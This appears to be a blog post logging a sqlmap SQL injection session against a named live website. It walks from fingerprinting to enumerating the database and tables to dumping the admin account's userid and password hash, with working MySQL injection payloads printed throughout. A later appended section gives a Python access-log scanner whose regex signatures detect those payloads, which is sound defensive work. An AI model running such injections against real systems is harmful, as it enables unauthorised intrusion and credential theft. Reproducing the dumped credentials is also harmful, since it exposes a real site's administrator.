sqlmap example: injecting MySQL

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the name of the current user

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
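A defender-side view of the session above, as an added example that is not part of the original post: each of the four techniques sqlmap reported (the tautology `AND 799=799`, the `FLOOR(RAND(0)*2) ... GROUP BY` error trick, `UNION ALL SELECT`, and `SLEEP(5)`) leaves a recognisable query string in the web server's access log. The script below uses hypothetical signatures and constructed log lines (not from the target) to URL-decode each request and report which technique it matches.

```python
import re
from urllib.parse import unquote_plus

# One heuristic regex per technique sqlmap reported for article.php?id above.
# These are our own (hypothetical) detection signatures, not sqlmap's tests.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}

# Apache/NCSA combined log format; we only need client IP, timestamp and request path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')


def classify_request(path):
    """Return the techniques whose signature appears in the URL-decoded query string."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1])  # logs store the encoded form
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(lines):
    """Return (ip, timestamp, [techniques]) for every request that matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the whole scan
        techniques = classify_request(m.group("path"))
        if techniques:
            hits.append((m.group("ip"), m.group("ts"), techniques))
    return hits


# Constructed sample access-log lines (not from the target); the payloads mirror
# the four injection points sqlmap listed in the session above.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Apr/2013:16:50:01 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Apr/2013:16:50:02 +0800] "GET /article.php?id=276%20AND%20799=799 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"',
    '203.0.113.5 - - [04/Apr/2013:16:50:03 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 412 "-" "sqlmap/0.9"',
    '203.0.113.5 - - [04/Apr/2013:16:50:04 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL HTTP/1.1" 200 3301 "-" "sqlmap/0.9"',
    '203.0.113.5 - - [04/Apr/2013:16:50:05 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9"',
]

if __name__ == "__main__":
    for ip, ts, techniques in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} -> {', '.join(techniques)}")
```

The "resuming injection data from session file" lines in the post show that the noisy part of a run (the one that fires hundreds of such requests) happens before the enumeration commands; that earlier burst from one client IP is what a log review should catch.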